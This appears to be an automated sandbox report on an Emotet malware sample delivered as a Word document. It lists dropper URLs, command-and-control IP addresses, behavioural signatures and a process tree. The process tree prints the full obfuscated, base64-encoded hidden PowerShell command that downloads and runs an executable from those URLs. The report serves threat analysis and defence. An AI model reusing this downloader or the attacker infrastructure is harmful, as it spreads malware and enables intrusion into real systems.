Analysis

  • max time kernel
    28s
  • resource
    win10v191014
  • submitted
    16-01-2020 21:28

General

  • Target

    ff459925a85db389a7edc8d34a3790aa03a75c0169484d7aed22ed773e14016f

  • Sample

    200116-2qt4z772be

  • SHA256

    ff459925a85db389a7edc8d34a3790aa03a75c0169484d7aed22ed773e14016f

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://vanezas.com/wp-admin/5xUvXjS/

exe.dropper

http://stlucieairways.com/aujq/ryM608/

exe.dropper

https://www.expertencall.com/pts_bilderupload/SSIyLk/

exe.dropper

http://trends.nextg.io/wp-content/pc5079/

exe.dropper

https://www.volvorotterdam.nl/xmlimport/U7X743/

Extracted

Family

emotet

C2

70.123.95.180:80

190.17.44.48:80

59.120.5.154:80

192.241.143.52:8080

159.65.241.220:8080

45.79.95.107:443

69.163.33.84:8080

181.36.42.205:443

113.190.254.245:80

190.195.129.227:8090

50.28.51.143:8080

204.225.249.100:7080

99.252.27.6:80

185.160.229.26:80

77.55.211.77:8080

68.187.160.28:443

152.231.89.226:80

86.123.138.76:80

82.196.15.205:8080

80.11.158.65:8080

rsa_pubkey.plain

Signatures

  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ff459925a85db389a7edc8d34a3790aa03a75c0169484d7aed22ed773e14016f.doc" /o ""
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Checks processor information in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Enumerates system info in registry
    PID:4956
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABKAGEAdwB3AGUAZwB2AHEAdwA9ACcATQB2AG4AYgBmAGEAZgBlAHEAdQBpAGwAYgAnADsAJABJAGkAbwBnAGYAcgB5AGgAdABkAHgAeQAgAD0AIAAnADMAOQAyACcAOwAkAFoAcQB6AGkAaAB6AHkAegBlAHEAbgB4AHUAPQAnAEwAaQBpAHQAdwBrAGcAbgBkAHMAdAB4ACcAOwAkAEMAZwBnAG4AYwBpAGYAbQBqAGIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEkAaQBvAGcAZgByAHkAaAB0AGQAeAB5ACsAJwAuAGUAeABlACcAOwAkAFAAdQBtAGMAaQB3AGEAeAA9ACcATQB3AG8AdwBwAG0AaABrAHIAZAB3ACcAOwAkAEQAdwBoAGkAYQBrAGYAcAB1AG4AbABuAGUAPQAmACgAJwBuACcAKwAnAGUAdwAtACcAKwAnAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAG4AZQB0AC4AVwBlAEIAQwBsAGkAZQBuAHQAOwAkAEgAYQBhAGQAbQB5AGMAYwB6AHoAbQBlAHoAPQAnAGgAdAB0AHAAcwA6AC8ALwB2AGEAbgBlAHoAYQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwA1AHgAVQB2AFgAagBTAC8AKgBoAHQAdABwADoALwAvAHMAdABsAHUAYwBpAGUAYQBpAHIAdwBhAHkAcwAuAGMAbwBtAC8AYQB1AGoAcQAvAHIAeQBNADYAMAA4AC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBlAHgAcABlAHIAdABlAG4AYwBhAGwAbAAuAGMAbwBtAC8AcAB0AHMAXwBiAGkAbABkAGUAcgB1AHAAbABvAGEAZAAvAFMAUwBJAHkATABrAC8AKgBoAHQAdABwADoALwAvAHQAcgBlAG4AZABzAC4AbgBlAHgAdABnAC4AaQBvAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHAAYwA1ADAANwA5AC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgB2AG8AbAB2AG8AcgBvAHQAdABlAHIAZABhAG0ALgBuAGwALwB4AG0AbABpAG0AcABvAHIAdAAvAFUANwBYADcANAAzAC8AJwAuACIAUwBgAHAATABpAHQAIgAoACcAKgAnACkAOwAkAFEAZgBuAHQAYwB2AHEAbwBiAG8AeABwAD0AJwBWAGwAYgByAG8AbABzAGgAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEcAcwBqAGgAZQBrAGQAcQB6AGgAcAB0AHcAIABpAG4AIAAkAEgAYQBhAGQAbQB5AGMAYwB6AHoAbQBlAHoAKQB7AHQAcgB5AHsAJABEAHcAaABpAGEAawBmAHAAdQBuAGwAbgBlAC4AIgBEAGAAbwB3AGAATgBsAE8AQQBkAGYASQBgAGwAZQAiACgAJABHAHMAagBoAGUAawBkAHEAegBoAHAAdAB3ACwAIAAkAEMAZwBnAG4AYwBpAGYAbQBqAGIAKQA7ACQASgB4AHEAawBqAGcAZwBmAGwAYwB2AHcAdQA9ACcAQgBnAGIAbABpAHEAZwB1AGwAbQB5AHAAbQAnADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEMAZwBnAG4AYwBpAGYAbQBqAGIAKQAuACIATABgAEUATgBgAEcAdABoACIAIAAtAGcAZQAgADIANgAzADgAOQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAGAAVABBAHIAVAAiACgAJABDAGcAZwBuAGMAaQBmAG0AagBiACkAOwAkAEoAZgByAGoAZgBlAGcAZQA9ACcAUwBlAHQAZgB5AHEAeQB0AG0AJwA7AGIAcgBlAGEAawA7ACQAVgByAGcAZABjAGYAeABsAHEAdAB3AD0AJwBNAHIAZAB1AHIAdwBhAHgAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWABjAGIAZgBvAGgAcgBzAD0AJwBLAG4AbwBrAGYAZAB6AGkAcwBmAG8AJwA=
    1⤵
    • Suspicious use of WriteProcessMemory
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    PID:4052
    • C:\Users\Admin\392.exe
      "C:\Users\Admin\392.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      PID:4732
      • C:\Users\Admin\392.exe
        --ea4f444a
        3⤵
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        PID:3784

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\392.exe

  • C:\Users\Admin\392.exe

  • C:\Users\Admin\392.exe

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438

  • memory/3784-10-0x00000000007A0000-0x00000000007B7000-memory.dmp

    Filesize

    92KB

  • memory/3784-11-0x0000000000400000-0x0000000000496000-memory.dmp

    Filesize

    600KB

  • memory/4732-7-0x0000000000900000-0x0000000000917000-memory.dmp

    Filesize

    92KB